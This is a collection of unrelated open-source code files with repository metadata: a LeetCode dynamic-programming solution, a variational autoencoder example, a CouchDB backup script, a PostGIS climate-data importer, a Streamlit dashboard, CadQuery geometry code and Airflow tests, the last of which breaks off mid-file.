cdfc9bf4504d5cc25bda0a98802b00001e0b1b9c | 1,031 | py | Python | LeetCode/516-longest-palindromic-subsequence.py | leaving-voider/LeetCode.cn-Record | 2922cbdab85556bc0625adc9e6ce44849232e4f4 | [
"MIT"
]
| null | null | null | LeetCode/516-longest-palindromic-subsequence.py | leaving-voider/LeetCode.cn-Record | 2922cbdab85556bc0625adc9e6ce44849232e4f4 | [
"MIT"
]
| null | null | null | LeetCode/516-longest-palindromic-subsequence.py | leaving-voider/LeetCode.cn-Record | 2922cbdab85556bc0625adc9e6ce44849232e4f4 | [
"MIT"
]
| null | null | null | ###############################################################################################
# 还是常规题,和【5. 最长回文子串】不同在于【子串】和【子数组】是【连续】的,而【子序列】可以不连续
# 因此定义dp的方式就不一样,对于【子序列】可以定义长度,而【连续】的【子串】则用是否
###########
# 时间复杂度:O(n^2)
# 空间复杂度:O(n^2)
###############################################################################################
class Solution:
def longestPalindromeSubseq(self, s: str) -> int:
N, len_ = len(s)+1, len(s)
dp = [[0]*N for _ in range(N)] # dp[i][j]: i到j之间的回文序列长度
for i in range(len_):
dp[i][i] = 1
if i < len_-1:
dp[i][i+1] = 2 if s[i] == s[i+1] else 1
for le in range(3, len_+1):
for i in range(len_-le+1):
l, r = i, i+le-1
if s[l] == s[r]:
dp[l][r] = dp[l+1][r-1] + 2
else:
dp[l][r] = max(dp[l][r-1], dp[l+1][r], dp[l+1][r-1]) # 其实dp[l+1][r-1]不需要,因为它是最短的,dp[l][r-1]或dp[l+1][r]都包含了此种情况
return dp[0][len_-1] | 44.826087 | 131 | 0.354995 | 758 | 0.585328 | 0 | 0 | 0 | 0 | 0 | 0 | 679 | 0.524324 |
cdfcd2a90ed7ec6257eb01c41e93f4909519bbec | 3,427 | py | Python | examples/vae.py | zhangyewu/edward | 8ec452eb0a3801df8bda984796034a9e945faec7 | [
"Apache-2.0"
]
| 5,200 | 2016-05-03T04:59:01.000Z | 2022-03-31T03:32:26.000Z | examples/vae.py | zhangyewu/edward | 8ec452eb0a3801df8bda984796034a9e945faec7 | [
"Apache-2.0"
]
| 724 | 2016-05-04T09:04:37.000Z | 2022-02-28T02:41:12.000Z | examples/vae.py | zhangyewu/edward | 8ec452eb0a3801df8bda984796034a9e945faec7 | [
"Apache-2.0"
]
| 1,004 | 2016-05-03T22:45:14.000Z | 2022-03-25T00:08:08.000Z | """Variational auto-encoder for MNIST data.
References
----------
http://edwardlib.org/tutorials/decoder
http://edwardlib.org/tutorials/inference-networks
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import os
import tensorflow as tf
from edward.models import Bernoulli, Normal
from edward.util import Progbar
from observations import mnist
from scipy.misc import imsave
tf.flags.DEFINE_string("data_dir", default="/tmp/data", help="")
tf.flags.DEFINE_string("out_dir", default="/tmp/out", help="")
tf.flags.DEFINE_integer("M", default=100, help="Batch size during training.")
tf.flags.DEFINE_integer("d", default=2, help="Latent dimension.")
tf.flags.DEFINE_integer("n_epoch", default=100, help="")
FLAGS = tf.flags.FLAGS
if not os.path.exists(FLAGS.out_dir):
os.makedirs(FLAGS.out_dir)
def generator(array, batch_size):
"""Generate batch with respect to array's first axis."""
start = 0 # pointer to where we are in iteration
while True:
stop = start + batch_size
diff = stop - array.shape[0]
if diff <= 0:
batch = array[start:stop]
start += batch_size
else:
batch = np.concatenate((array[start:], array[:diff]))
start = diff
batch = batch.astype(np.float32) / 255.0 # normalize pixel intensities
batch = np.random.binomial(1, batch) # binarize images
yield batch
def main(_):
ed.set_seed(42)
# DATA. MNIST batches are fed at training time.
(x_train, _), (x_test, _) = mnist(FLAGS.data_dir)
x_train_generator = generator(x_train, FLAGS.M)
# MODEL
# Define a subgraph of the full model, corresponding to a minibatch of
# size M.
z = Normal(loc=tf.zeros([FLAGS.M, FLAGS.d]),
scale=tf.ones([FLAGS.M, FLAGS.d]))
hidden = tf.layers.dense(z, 256, activation=tf.nn.relu)
x = Bernoulli(logits=tf.layers.dense(hidden, 28 * 28))
# INFERENCE
# Define a subgraph of the variational model, corresponding to a
# minibatch of size M.
x_ph = tf.placeholder(tf.int32, [FLAGS.M, 28 * 28])
hidden = tf.layers.dense(tf.cast(x_ph, tf.float32), 256,
activation=tf.nn.relu)
qz = Normal(loc=tf.layers.dense(hidden, FLAGS.d),
scale=tf.layers.dense(
hidden, FLAGS.d, activation=tf.nn.softplus))
# Bind p(x, z) and q(z | x) to the same TensorFlow placeholder for x.
inference = ed.KLqp({z: qz}, data={x: x_ph})
optimizer = tf.train.RMSPropOptimizer(0.01, epsilon=1.0)
inference.initialize(optimizer=optimizer)
tf.global_variables_initializer().run()
n_iter_per_epoch = x_train.shape[0] // FLAGS.M
for epoch in range(1, FLAGS.n_epoch + 1):
print("Epoch: {0}".format(epoch))
avg_loss = 0.0
pbar = Progbar(n_iter_per_epoch)
for t in range(1, n_iter_per_epoch + 1):
pbar.update(t)
x_batch = next(x_train_generator)
info_dict = inference.update(feed_dict={x_ph: x_batch})
avg_loss += info_dict['loss']
# Print a lower bound to the average marginal likelihood for an
# image.
avg_loss /= n_iter_per_epoch
avg_loss /= FLAGS.M
print("-log p(x) <= {:0.3f}".format(avg_loss))
# Prior predictive check.
images = x.eval()
for m in range(FLAGS.M):
imsave(os.path.join(FLAGS.out_dir, '%d.png') % m,
images[m].reshape(28, 28))
if __name__ == "__main__":
tf.app.run()
| 31.731481 | 77 | 0.676685 | 0 | 0 | 538 | 0.156989 | 0 | 0 | 0 | 0 | 861 | 0.25124 |
cdff5880102eb2ba8d22b6cbec2e9bb5407da963 | 2,196 | py | Python | backup.py | BigBlueHat/copy-couch | ab4759540faecae8239c94e8045f7fce1f4a4914 | [
"Apache-2.0"
]
| null | null | null | backup.py | BigBlueHat/copy-couch | ab4759540faecae8239c94e8045f7fce1f4a4914 | [
"Apache-2.0"
]
| null | null | null | backup.py | BigBlueHat/copy-couch | ab4759540faecae8239c94e8045f7fce1f4a4914 | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python
"""copy-couch makes copies of couches. no joke.
License: Apache 2.0 - http://opensource.org/licenses/Apache-2.0
"""
import argparse
import base64
import ConfigParser
import datetime
import json
import requests
argparser = argparse.ArgumentParser()
argparser.add_argument('config_file', type=file,
help="Config INI file. See `config.sample.ini` for info.")
args = argparser.parse_args()
config = ConfigParser.RawConfigParser({
'protocol': 143,
'host': 'localhost:5984'
})
config.readfp(args.config_file)
local_couch = config._sections['local']
local_couch['password'] = base64.b64decode(local_couch['password'])
local_url = local_couch['protocol'] + '://' + local_couch['host'] + '/'
remote_couch = config._sections['remote']
remote_couch['password'] = base64.b64decode(remote_couch['password'])
remote_url = remote_couch['protocol'] + '://' + remote_couch['host'] + '/'
# setup local db session
local_db = requests.Session()
local_db.auth = (local_couch['user'], local_couch['password'])
# setup remote db session
remote_db = requests.Session()
remote_db.auth = (remote_couch['user'], remote_couch['password'])
rv = local_db.get(local_url).json()
uuid = rv['uuid']
rv = local_db.get(local_url + '_all_dbs').json()
# TODO: make which DB's configurable
dbs = [db for db in rv if db[0] != '_']
# create & store one rep_doc per database
for db in dbs:
# create _replicator docs for each DB on local; target remote
rep_doc = {
"_id": "backup~" + datetime.datetime.now().isoformat(),
"source": local_url,
"target": remote_couch['protocol'] + '://' \
+ remote_couch['user'] + ':' + remote_couch['password'] \
+ '@' + remote_couch['host'] + '/backup%2F' + uuid + '%2F',
"create_target": True
}
rep_doc['source'] += db;
rep_doc['target'] += db;
# TODO: make the backup db name configurable / reusable
print 'Copying ' + db
print ' from: ' + local_url
print ' to: ' + remote_url + 'backup%2F' + uuid + '%2F' + db
rv = local_db.post(local_url + '_replicate', json=rep_doc, headers = {
'Content-Type': 'application/json'})
print rv.json()
| 29.675676 | 74 | 0.659836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 839 | 0.382058 |
a8042d0c00c4fb676c0f0e3967070e3d72d5ef12 | 3,568 | py | Python | import_scripts/gpcc2gcmon.py | Jozelito/Raster2TXT | 337c87298ffc6227ca952e9e5cd17a54979e2224 | [
"MIT"
]
| null | null | null | import_scripts/gpcc2gcmon.py | Jozelito/Raster2TXT | 337c87298ffc6227ca952e9e5cd17a54979e2224 | [
"MIT"
]
| null | null | null | import_scripts/gpcc2gcmon.py | Jozelito/Raster2TXT | 337c87298ffc6227ca952e9e5cd17a54979e2224 | [
"MIT"
]
| 1 | 2018-05-29T21:16:44.000Z | 2018-05-29T21:16:44.000Z | #Script para la importacion de datos netCDF de un mes del GPCC en PostGIS.
#Autor: José I. Álvarez Francoso
import sys
from osgeo import gdal, ogr, osr
from osgeo.gdalconst import GA_ReadOnly, GA_Update
# Funcion para sobreescribir el mensaje de porcentaje completado
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
# Funcion principal
def gpcc2gcm_win(pg_connection_string, mes, agno):
# Registra drivers gdal
gdal.AllRegister()
# Driver de postgis, para poder crear la tabla
driver = ogr.GetDriverByName('PostgreSQL')
# Se asume que el srs es 4326
srs = osr.SpatialReference()
srs.ImportFromEPSG(4326)
# Leemos la ultima banda del dataset (ultimo mes)
fuente = "C:/Cualquier_directorio" + mes + "_" + agno + "/first_guess_monthly_" + agno + "_" + mes + ".nc"
dataset = gdal.Open( fuente, GA_ReadOnly )
subdatasets = dataset.GetSubDatasets()
subdataset_p = subdatasets[0][0]
sds = gdal.Open(subdataset_p, gdal.GA_ReadOnly)
cols = sds.RasterXSize
rows = sds.RasterYSize
# Creamos la tabla Postgis llamada "ghcn_t" para nuestros datos en el esquema public
table_name = 'gpcc_p_' + mes + agno
pg_ds = ogr.Open(pg_connection_string, GA_Update )
pg_layer = pg_ds.CreateLayer(table_name, srs = srs, geom_type=ogr.wkbPoint,
options = [
'GEOMETRY_NAME=geom',# Nombre del campo de geometria
'OVERWRITE=YES', # Borra y crea la tabla de nuevo
'SCHEMA=public',# Nombre del esquema
])
print 'Creada la tabla %s.' % table_name
# Creamos el campo "temp" y campo "id_point" en la tabla
fd_mes = ogr.FieldDefn('mes', ogr.OFTInteger)
pg_layer.CreateField(fd_mes)
print 'Creado el campo mes.'
fd_agno = ogr.FieldDefn('agno', ogr.OFTInteger)
pg_layer.CreateField(fd_agno)
print 'Creado el campo agno.'
fd_temp = ogr.FieldDefn('p_mes', ogr.OFTReal)
pg_layer.CreateField(fd_temp)
print 'Creado el campo p_mes.'
# get georeference transformation information
pixelWidth = 1
pixelHeight = 1
xOrigin = -179.5
yOrigin = 89.5
# Iteramos filas y columnas y definimos x e y
data = []
band = sds.GetRasterBand(1)
band_data = band.ReadAsArray(0, 0, cols, rows)
data.append(band_data)
id_n = 0
for r in range(rows):
y = yOrigin - (r * pixelHeight)
for c in range(cols):
x = xOrigin + (c * pixelWidth)
# Para cada celdilla, anadimos un punto en la capa Postgis
point_wkt = 'POINT(%s %s)' % (x, y)
point = ogr.CreateGeometryFromWkt(point_wkt)
featureDefn = pg_layer.GetLayerDefn()
feature = ogr.Feature(featureDefn)
# Definimos el valor y lo anadimos al campo "temp". Grados Kelvin (restamos 273)
value = float(data[0][r,c])
# Gestion de los null
if value < 0:
feature.UnsetField('p_mes')
else:
feature.SetField('p_mes', value)
feature.SetField('mes', mes)
feature.SetField('agno', agno)
id_n+=1
porcent = id_n * 100/ 64800
sys.stdout.write('porcentaje completado: ' + str(porcent))
sys.stdout.flush()
restart_line()
# print 'Guardando el valor: %s para la variable %s en el punto x: %s, y: %s' % (value, 'temp', x, y)
# Definimos la geometria de la capa y finalizamos su creacion
feature.SetGeometry(point)
pg_layer.CreateFeature(feature)
if __name__ == '__main__':
# El usuario tiene que definir al menos un parametro: la cadena de conexion Postgis GDAL
if len(sys.argv) < 4 or len(sys.argv) > 4:
print "uso: <GDAL PostGIS connection string> <mes> <agno>"
raise SystemExit
pg_connection_string = sys.argv[1]
mes = sys.argv[2]
agno = sys.argv[3]
gpcc2gcm_win(pg_connection_string, mes, agno)
raise SystemExit
| 36.783505 | 107 | 0.711323 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,431 | 0.40084 |
a804975ed4327041257e7e887706be1ffc7b7803 | 2,829 | py | Python | app.py | Raisler/Brazil_HDI_DataVisualization | 76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c | [
"MIT"
]
| null | null | null | app.py | Raisler/Brazil_HDI_DataVisualization | 76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c | [
"MIT"
]
| null | null | null | app.py | Raisler/Brazil_HDI_DataVisualization | 76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c | [
"MIT"
]
| null | null | null | import streamlit as st
import pandas as pd
import numpy as np
import plotly.express as px
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import matplotlib.pyplot as plt
def load_data(data):
data=pd.read_csv(data)
return data
df = load_data('hdi.csv')
st.title('Human Development Index in Brazil')
select = st.sidebar.selectbox('Choose', ['Home', 'Analysis by Year', 'Analysis by State'])
if select == 'Home':
st.write('That is a dashboard to see the HDI of all states in Brazil, you can see graphics and values!')
st.write('In soon, more improvements. #Version 1')
st.write('In the sidebar, choose your option for the better view for you!')
st.write('Author: Raisler Voigt | suggestions? [email protected]')
st.markdown('''<p align="center">
<a href="https://www.instagram.com/raislervoigt/" target="_blank" rel="noopener noreferrer">Instagram</a> •
<a href="https://twitter.com/VoigtRaisler" target="_blank" rel="noopener noreferrer">Twitter</a> •
<a href="https://www.linkedin.com/in/raisler-voigt7/" target="_blank" rel="noopener noreferrer">Linkedin</a> •
<a href="https://github.com/Raisler" target="_blank" rel="noopener noreferrer">GitHub</a>
</p>''', unsafe_allow_html=True)
if select == 'Analysis by Year':
select1 = st.sidebar.selectbox('Análise por Ano', [2017, 2010, 2000, 1991])
fig1 = px.scatter(df, x="HDI Health {0}".format(select1), y="HDI Education {0}".format(select1), size="HDI {0}".format(select1), color="UF")
fig2 = px.histogram(df, x="UF", y = "HDI {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig3 = px.histogram(df, x="UF", y = "HDI Education {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig4 = px.histogram(df, x="UF", y = "HDI Health {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig5 = px.histogram(df, x="UF", y = "HDI Wealth {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig6 = df[['UF', "HDI Education {0}".format(select1), "HDI Health {0}".format(select1), "HDI Wealth {0}".format(select1)]]
st.write(fig1)
st.write(fig2)
st.subheader('HDI Education')
st.write(fig3)
st.subheader('HDI Health')
st.write(fig4)
st.subheader('HDI Wealth')
st.write(fig5)
st.write(fig6)
if select == 'Analysis by State':
select2 = st.sidebar.selectbox('Choose the State', df['UF'])
cdf = df
cdf.index = cdf['UF']
state = cdf.index == '{}'.format(select2)
state = cdf[state]
trans = state.transpose()
trans = trans.sort_index(ascending = False)
fig1 = px.histogram(x = trans.index, y = trans['{}'.format(select2)]).update_xaxes(categoryorder='total descending')
fig2 = state.transpose()
st.write(fig1)
st.write(fig2)
| 40.414286 | 144 | 0.679392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,208 | 0.425952 |
a804e02acc0b6d5ed28538bc5bf647eab91b6259 | 657 | py | Python | Examples/pycomBlink/main.py | sophie-bernier/RemoteOceanAcidificationMonitor | 6a8b799826a2eb9b1d5064883193c61eea0ee310 | [
"Unlicense"
]
| 1 | 2021-06-22T23:07:31.000Z | 2021-06-22T23:07:31.000Z | Examples/pycomBlink/main.py | sophie-bernier/RemoteOceanAcidificationMonitor | 6a8b799826a2eb9b1d5064883193c61eea0ee310 | [
"Unlicense"
]
| null | null | null | Examples/pycomBlink/main.py | sophie-bernier/RemoteOceanAcidificationMonitor | 6a8b799826a2eb9b1d5064883193c61eea0ee310 | [
"Unlicense"
]
| null | null | null | # main.py
import pycom
import time
pycom.heartbeat(False)
red = 0x08
blue = 0x00
green = 0x00
sleepTime = 0.01
def setRgb(red, green, blue):
rgbValue = 0x000000
rgbValue |= (red << 16) | (green << 8) | blue
pycom.rgbled(rgbValue)
return
while True:
###
#if red >= 0x08:
# if green > 0:
# green -= 1
# else:
# blue += 1
#if blue >= 0x08:
# if red > 0:
# red -= 1
# else:
# green += 1
#if green >= 0x08:
# if blue > 0:
# blue -= 1
# else:
# red += 1
###
setRgb(red, green, blue)
time.sleep(sleepTime)
| 16.425 | 49 | 0.464231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 255 | 0.388128 |
a8054920242ac3e7b7e99120e329e53db3f718af | 1,891 | py | Python | dsn/pp/construct.py | expressionsofchange/nerf0 | 788203619fc89c92e8c7301d62bbc4f1f4ee66e1 | [
"MIT"
]
| 2 | 2019-04-30T05:42:05.000Z | 2019-08-11T19:17:20.000Z | dsn/pp/construct.py | expressionsofchange/nerf0 | 788203619fc89c92e8c7301d62bbc4f1f4ee66e1 | [
"MIT"
]
| null | null | null | dsn/pp/construct.py | expressionsofchange/nerf0 | 788203619fc89c92e8c7301d62bbc4f1f4ee66e1 | [
"MIT"
]
| null | null | null | from spacetime import get_s_address_for_t_address
from s_address import node_for_s_address
from dsn.s_expr.structure import TreeText
from dsn.pp.structure import PPNone, PPSingleLine, PPLispy, PPAnnotatedSExpr
from dsn.pp.clef import PPUnset, PPSetSingleLine, PPSetLispy
def build_annotated_tree(node, default_annotation):
if isinstance(node, TreeText):
annotated_children = []
else:
annotated_children = [build_annotated_tree(child, default_annotation) for child in node.children]
return PPAnnotatedSExpr(
node,
default_annotation,
annotated_children,
)
def construct_pp_tree(tree, pp_annotations):
"""Because pp notes take a t_address, they can be applied on future trees (i.e. the current tree).
The better (more general, more elegant and more performant) solution is to build the pp_tree in sync with the
general tree, and have construct_pp_tree be a function over notes from those clefs rather than on trees.
"""
annotated_tree = build_annotated_tree(tree, PPNone())
for annotation in pp_annotations:
pp_note = annotation.annotation
s_address = get_s_address_for_t_address(tree, pp_note.t_address)
if s_address is None:
continue # the node no longer exists
annotated_node = node_for_s_address(annotated_tree, s_address)
if isinstance(pp_note, PPUnset):
new_value = PPNone()
elif isinstance(pp_note, PPSetSingleLine):
new_value = PPSingleLine()
elif isinstance(pp_note, PPSetLispy):
new_value = PPLispy()
else:
raise Exception("Unknown PP Note")
# let's just do this mutably first... this is the lazy approach (but that fits with the caveats mentioned at the
# top of this method)
annotated_node.annotation = new_value
return annotated_tree
| 35.679245 | 120 | 0.710206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 507 | 0.268112 |
a8058f52d55c838079c4a938e2376efb1f6aa6ab | 3,704 | py | Python | geneparse/__init__.py | legaultmarc/geneparse | 5a844df77ded5adc765a086a8d346fce6ba01f3d | [
"MIT"
]
| 4 | 2018-11-09T11:10:24.000Z | 2021-07-23T22:17:58.000Z | geneparse/__init__.py | legaultmarc/geneparse | 5a844df77ded5adc765a086a8d346fce6ba01f3d | [
"MIT"
]
| 5 | 2017-05-02T15:28:01.000Z | 2018-04-16T18:29:15.000Z | geneparse/__init__.py | legaultmarc/geneparse | 5a844df77ded5adc765a086a8d346fce6ba01f3d | [
"MIT"
]
| 1 | 2017-05-12T17:58:32.000Z | 2017-05-12T17:58:32.000Z | """A module to parse genetics file formats."""
# This file is part of geneparse.
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Pharmacogenomics Centre
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import re
from .readers import plink, impute2, dataframe, bgen, dict_based, vcf
from .core import (Genotypes, Variant, ImputedVariant, SplitChromosomeReader,
Chromosome)
from .extract.extractor import Extractor
try:
from .version import geneparse_version as __version__
except ImportError:
__version__ = None
__author__ = "Marc-Andre Legault"
__copyright__ = "Copyright 2014, Beaulieu-Saucier Pharmacogenomics Centre"
__credits__ = ["Louis-Philippe Lemieux Perreault", "Marc-Andre Legault"]
__license__ = "MIT"
__maintainer__ = "Louis-Philippe Lemieux Perreault"
__email__ = "[email protected]"
__status__ = "Development"
# TODO:
# 1. Warn and show last exception if no reader correctly initialized.
# 2. Could also make it async to load faster.
class _SplitChromosomeReaderFactory(object):
def __init__(self, reader_class):
self.reader_class = reader_class
def __call__(self, pattern, *args, **kwargs):
if "{chrom}" not in pattern:
raise ValueError("Expected '{chrom}' as a placeholder in the "
"pattern.")
# Explode the path for every possible chromosome.
chrom_to_reader = {}
last_exception = None
for chrom in list(range(1, 23)) + ["X", "Y", "XY", "MT"]:
chrom = str(chrom)
cur = re.sub("{chrom}", chrom, pattern)
try:
# Instantiate the reader.
chrom_to_reader[chrom] = self.reader_class(
cur, *args, **kwargs
)
except Exception as e:
last_exception = e
if len(chrom_to_reader) == 0:
raise ValueError(
"Could not initialize any genotype reader for chromosomes 1 "
"to 22 or X, Y, XY, MT.\nLast exception was: {}."
"".format(last_exception)
)
return SplitChromosomeReader(chrom_to_reader)
parsers = {
"plink": plink.PlinkReader,
"bgen": bgen.BGENReader,
"vcf": vcf.VCFReader,
"chrom-split-plink": _SplitChromosomeReaderFactory(plink.PlinkReader),
"impute2": impute2.Impute2Reader,
"chrom-split-impute2": _SplitChromosomeReaderFactory(
impute2.Impute2Reader
),
"chrom-split-bgen": _SplitChromosomeReaderFactory(bgen.BGENReader),
"dataframe": dataframe.DataFrameReader,
"dict-based": dict_based.DictBasedReader,
"pickle": dict_based.PickleBasedReader,
}
| 37.04 | 79 | 0.687365 | 1,166 | 0.314795 | 0 | 0 | 0 | 0 | 0 | 0 | 1,927 | 0.520248 |
a8065cec94c9ac0bb277d2b7b2c4a7aa013dd5ba | 3,285 | py | Python | pallet.py | sprightlyManifesto/cadQuery2 | 207a1ff2420210460539400dfd1945e8b7245497 | [
"MIT"
]
| 1 | 2021-05-31T00:08:02.000Z | 2021-05-31T00:08:02.000Z | pallet.py | sprightlyManifesto/cadQuery2 | 207a1ff2420210460539400dfd1945e8b7245497 | [
"MIT"
]
| null | null | null | pallet.py | sprightlyManifesto/cadQuery2 | 207a1ff2420210460539400dfd1945e8b7245497 | [
"MIT"
]
| null | null | null | from cadquery import *
from math import sin,cos,acos,asin,pi,atan2
class Pallet:
def __init__(self):
self.torx6 = { 6:(1.75,1.27), 8:(2.4,1.75), 10:(2.8,2.05), 15:(3.35,2.4), 20:(3.95,2.85),
25:(4.50,3.25), 30:(5.6,4.05), 40:(6.75,4.85),45:(7.93,5.64), 50:(8.95,6.45),
55:(11.35,8.05),60:(13.45,9.6),70:(15.7,11.2),80:(17.75,12.8),90:(20.2,14.4),
100:(22.4,16)}
def radialSlot(self,wp,slotRad, cutterRad, a1, a2,offset=(0,0)):
if slotRad > cutterRad:
IR = slotRad-cutterRad
OR = slotRad+cutterRad
middle = a1+(a2-a1)/2
result = (wp.moveTo(IR*sin(a1),IR*cos(a1))
.threePointArc((IR*sin(middle),IR*cos(middle)),(IR*sin(a2),IR*cos(a2)))
.tangentArcPoint((cutterRad*2*sin(a2),cutterRad*2*cos(a2)))
.threePointArc((OR*sin(middle),OR*cos(middle)),(OR*sin(a1),OR*cos(a1)))
.tangentArcPoint((-cutterRad*2*sin(a1),-cutterRad*2*cos(a1))).close()
)
else:
result = wp
#log("issues")
return(result)
def hexAF(self,wp,af):
R = af/cos(pi/6)/2
return wp.moveTo(-sin(pi/6)*R,af/2).lineTo(sin(pi/6)*R,af/2).lineTo(R,0)\
.lineTo(sin(pi/6)*R,-af/2).lineTo(-sin(pi/6)*R,-af/2).lineTo(-R,0).close()
def torx(self,wp,no):
A , B = self.torx6[no]
re=A*0.1
ri=A*0.175
x = ri*(sin(pi/6)*(A/2-re))/(re + ri)
y1 = B/2 + ri
y2 = cos(pi/6)*(A/2 - re)
y = y1 - ri*((y1 -y2))/(re + ri)
#log(f"x:{x} y1:{y1} y2:{y2}")
phi = atan2(x,y)
#log(f"phi:{round(phi,2)} x:{round(x,2)} y:{round(y,2)} re:{round(re,2)} ri:{round(ri,2)}")
R = (x**2+y**2)**0.5
Rm = A/2
B = B/2
res = wp.moveTo(R*sin(-phi),R*cos(-phi)).threePointArc((0,B),(R*sin(phi),R*cos(phi))) \
.threePointArc((Rm*sin(pi/6),Rm*cos(pi/6)),(R*sin(pi/3-phi),R*cos(pi/3-phi))) \
.threePointArc((B*sin(pi/3), B*cos(pi/3)),(R*sin(phi+pi/3),R*cos(phi+pi/3))) \
.threePointArc((Rm*sin(3*pi/6),Rm*cos(3*pi/6)),(R*sin(2*pi/3-phi),R*cos(2*pi/3-phi))) \
.threePointArc((B*sin(2*pi/3), B*cos(2*pi/3)),(R*sin(phi+2*pi/3),R*cos(phi+2*pi/3))) \
.threePointArc((Rm*sin(5*pi/6),Rm*cos(5*pi/6)),(R*sin(3*pi/3-phi),R*cos(3*pi/3-phi))) \
.threePointArc((B*sin(3*pi/3), B*cos(3*pi/3)),(R*sin(phi+3*pi/3),R*cos(phi+3*pi/3))) \
.threePointArc((Rm*sin(7*pi/6),Rm*cos(7*pi/6)),(R*sin(4*pi/3-phi),R*cos(4*pi/3-phi))) \
.threePointArc((B*sin(4*pi/3), B*cos(4*pi/3)),(R*sin(phi+4*pi/3),R*cos(phi+4*pi/3))) \
.threePointArc((Rm*sin(9*pi/6),Rm*cos(9*pi/6)),(R*sin(5*pi/3-phi),R*cos(5*pi/3-phi))) \
.threePointArc((B*sin(5*pi/3), B*cos(5*pi/3)),(R*sin(phi+5*pi/3),R*cos(phi+5*pi/3))) \
.threePointArc((Rm*sin(11*pi/6),Rm*cos(11*pi/6)),(R*sin(6*pi/3-phi),R*cos(6*pi/3-phi))) \
.close()
return res
if __name__== "__main__":
p = Pallet()
ks = list(p.torx6.keys())
ks.reverse()
a = cq.Workplane().circle(12).extrude(-3)
for k in ks:
a = a.union(p.torx(a.faces(">Z").workplane(),k).extrude(1))
| 48.308824 | 101 | 0.497717 | 2,986 | 0.90898 | 0 | 0 | 0 | 0 | 0 | 0 | 150 | 0.045662 |
a8071813703c97e154c1a58b74d953608becaf8d | 235 | py | Python | old-regressions/python/tst6.py | muchang/z3test | e3e7739f98b7aa85427fcb8a39a4c675132a896e | [
"MIT"
]
| 23 | 2015-04-20T08:51:00.000Z | 2021-11-15T12:20:59.000Z | old-regressions/python/tst6.py | muchang/z3test | e3e7739f98b7aa85427fcb8a39a4c675132a896e | [
"MIT"
]
| 18 | 2016-03-02T15:17:42.000Z | 2021-12-16T22:10:05.000Z | old-regressions/python/tst6.py | muchang/z3test | e3e7739f98b7aa85427fcb8a39a4c675132a896e | [
"MIT"
]
| 30 | 2015-05-30T15:29:17.000Z | 2022-02-25T15:58:58.000Z |
# Copyright (c) 2015 Microsoft Corporation
from z3 import *
print(simplify(Sqrt(2)).sexpr())
set_option(":pp-decimal-precision", 50, pp_decimal=True)
print(simplify(Sqrt(2)).sexpr())
set_option(precision=20)
print(simplify(Sqrt(2)))
| 23.5 | 56 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.276596 |
a808c833e4004773a8618ea9f6a2827bf0e5f1ca | 2,044 | py | Python | data-detective-airflow/tests/dag_generator/test_tdag.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
]
| 5 | 2021-12-01T09:55:23.000Z | 2021-12-21T16:23:33.000Z | data-detective-airflow/tests/dag_generator/test_tdag.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
]
| 1 | 2021-11-16T15:55:34.000Z | 2021-11-16T15:55:34.000Z | data-detective-airflow/tests/dag_generator/test_tdag.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
]
| 2 | 2021-11-03T09:43:09.000Z | 2021-11-17T10:16:29.000Z | import pytest
import allure
from data_detective_airflow.constants import PG_CONN_ID, S3_CONN_ID
from data_detective_airflow.dag_generator.results import PgResult, PickleResult
from data_detective_airflow.dag_generator import ResultType, WorkType
@allure.feature('Dag results')
@allure.story('Create Pickle')
def test_dag_file_create_result(test_dag, context):
dag_result = test_dag.get_result(operator=None,
result_name='test',
context=context,
result_type=test_dag.result_type,
work_type=test_dag.work_type)
assert isinstance(dag_result, PickleResult)
test_dag.clear_all_works(context)
@allure.feature('Dag results')
@allure.story('Create S3')
@pytest.mark.parametrize('test_dag',
[(ResultType.RESULT_PICKLE.value,
WorkType.WORK_S3.value,
S3_CONN_ID)],
indirect=True)
def test_dag_s3_create_result(test_dag, context):
dag_result = test_dag.get_result(operator=None, result_name='test', context=context,
result_type=test_dag.result_type,
work_type=test_dag.work_type)
assert isinstance(dag_result, PickleResult)
test_dag.clear_all_works(context)
@allure.feature('Dag results')
@allure.story('Create PG')
@pytest.mark.parametrize('test_dag',
[(ResultType.RESULT_PG.value,
WorkType.WORK_PG.value,
PG_CONN_ID)],
indirect=True)
